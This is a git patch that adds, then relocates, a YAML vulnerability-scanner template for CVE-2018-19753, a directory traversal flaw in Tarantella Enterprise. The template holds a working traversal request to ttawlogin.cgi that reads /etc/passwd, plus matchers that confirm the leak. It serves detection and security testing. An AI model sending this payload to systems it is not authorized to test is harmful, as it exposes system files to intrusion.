From 5abba5a624e5426754154d8d720355b7c15b2749 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 1 Dec 2021 11:20:05 +0900 Subject: [PATCH 1/2] Create CVE-2018-19753.yaml --- CVE-2018-19753.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2018-19753.yaml diff --git a/CVE-2018-19753.yaml b/CVE-2018-19753.yaml new file mode 100644 index 0000000000..0af644b43a --- /dev/null +++ b/CVE-2018-19753.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-19753 +info: + name: Tarantella Enterprise Directory Traversal + author: 0x_Akoko + severity: high + description: Tarantella Enterprise versions prior to 3.11 suffer from a directory traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html + - https://www.cvedetails.com/cve/CVE-2018-19753 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-19753 + cwe-id: CWE-22 + tags: cve,cve2018,tarantella,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From a265f86133c03a9ad7845ebe537688e42b1c03f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 1 Dec 2021 19:08:50 +0530 Subject: [PATCH 2/2] Rename CVE-2018-19753.yaml to cves/2018/CVE-2018-19753.yaml --- CVE-2018-19753.yaml => cves/2018/CVE-2018-19753.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2018-19753.yaml => cves/2018/CVE-2018-19753.yaml (100%) diff --git a/CVE-2018-19753.yaml b/cves/2018/CVE-2018-19753.yaml similarity index 100% rename from CVE-2018-19753.yaml rename to cves/2018/CVE-2018-19753.yaml